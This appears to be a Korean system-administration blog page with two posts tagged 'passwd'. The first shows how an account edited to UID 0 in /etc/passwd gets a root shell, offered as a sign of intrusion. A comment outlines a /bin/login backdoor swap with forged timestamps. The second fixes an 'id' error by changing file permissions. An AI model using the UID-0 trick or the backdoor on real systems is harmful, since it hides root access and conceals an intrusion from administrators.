'passwd'에 해당하는 글 2건

아래와 같은 계정이 있다면 서버를 재설치하는게 좋다. 
해킹되었을 수 있다.

test 라는 계정을 생성한다.

passwd
test:x:503:503::/home/test:/bin/bash

아래 처럼 수정한다.
test:x:0:0::/home/test:/bin/bash

접속해보면 루트로 접근된다.

[root@linuxtip test]# ssh test@localhost
test@localhost's password:
Last login: Sat May  3 16:11:20 2008 from localhost.localdomain
[root@linuxtip ~]#

다른계정을 우회해서...접근해보면

[root@linuxtip test]# ssh jjangkbg@localhost
jjangkbg@localhost's password:
Last login: Sat May  3 16:16:11 2008 from localhost.localdomain
[jjangkbg@linuxtip ~]$ su - test
암호:
[root@linuxtip ~]# id
uid=0(root) gid=0(root) groups=0(root)
[root@linuxtip ~]#




신고

WRITTEN BY
김병국
유용했던 자료를 기록해 두었습니다. 도움이 되시길~~~ Welcome! I started this blog as a way to give back to all of the other system administrators who have taught me something in the past. Writing these posts brings me a lot of enjoyment and I hope you fun

받은 트랙백이 없고 , 댓글 하나 달렸습니다.
  1. /bin/login

    백도어 숨겨놓기... 대략 아래와 같은 방법으로 한다고 하는데..

    1. 먼저 백도어를 심기 위한 파일들을 물색한다.
    /bin/login 을 노린다.
    2. 백도어를 만든다. (퍼미션, 소유자 등을 확실히)
    3. % ls -al /bin/login 해서 파일 시간 기록..
    % ls -alct /bin/login 해서 파일 시간 기록...
    대부분의 경우 위의 두 명령의 출력결과는 다르게 나타난다.
    -c 옵션은 가장 최근의 수정날짜를 출력한다고 했다.

    4. mv 백도어파일 /bin/login
    date mmddHHMMyy # ls -alct 했을때 나온 날짜
    touch MMDDhhmmyy # ls -la 했을때 나온 날짜
    date mmddHHMMyy # 현재 시간

    4.의 과정을 스크립트로 만들면 아래와 같이 되지 않을까...

    #! /bin/sh

    back = /tmp/.../login # backdoor 용으로 만든 login
    target = /bin/login # 목표 ...

    now = `date '+%m%d%H%M%y'`
    mv $back $target
    date mmddHHMMyy # ls -alct /bin/login 했을때 나온 날짜를 넣고..
    touch MMDDhhmmyy # ls -al /bin/login 했을때 나온 날짜를 넣자..
    date $now # 현재 시간

    5. 잘돌아 가나 테스트....
secret
id: cannot find name for user ID



확인 해 본결과 /etc/passwd 600

644 로 변경하니 에러가 나타나지 않는다.
신고

'서버관리' 카테고리의 다른 글

vpn 2 대 동시 연결하여 사용할려면?  (0) 2012.11.27
제목을 입력해 주세요.  (0) 2012.11.27
id: cannot find name for user ID  (0) 2012.11.27
debian4 sources.list  (0) 2012.11.27
debian4 설치  (0) 2012.11.27
데비안 cd image 다운로드  (0) 2012.11.26

WRITTEN BY
김병국
유용했던 자료를 기록해 두었습니다. 도움이 되시길~~~ Welcome! I started this blog as a way to give back to all of the other system administrators who have taught me something in the past. Writing these posts brings me a lot of enjoyment and I hope you fun

받은 트랙백이 없고 , 댓글이 없습니다.
secret